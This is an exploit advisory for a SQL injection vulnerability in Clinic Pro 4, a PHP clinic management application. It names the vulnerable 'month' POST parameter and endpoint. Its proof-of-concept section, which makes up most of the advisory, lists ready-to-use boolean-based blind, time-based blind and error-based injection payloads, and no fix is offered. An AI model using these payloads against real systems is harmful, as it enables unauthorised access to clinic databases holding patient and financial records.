Clinic Pro 4 SQL Injection

Clinic Pro version 4 suffers from a remote SQL injection vulnerability.

MD5 | 32484b0286331286855241babe0af4e2

# Title: Clinic Pro - Clinic Management Software
# Date: 03.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage:
# Software Link:
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
It is developed by PHP Codeigniter Framework with HMVC Pattern. Clinic
system can be easily configured and fully automated as per clinic
requirement using this Automation Software.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.

# POC - SQLi :

# Parameter: month (POST)
# Request URL: http://localhost/welcome/monthly_expense_overview
# Type : boolean-based blind
month=06%' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 06 ELSE 0x28 END)) AND

# Type : time-based blind
month=06%' AND 4514=BENCHMARK(5000000,MD5(0x436d7970)) AND '%'='

# Type : error-based
month=06%' AND EXTRACTVALUE(2633,CONCAT(0x5c,0x7178766271,(SELECT
(ELT(2633=2633,1))),0x7171717171)) AND '%'='

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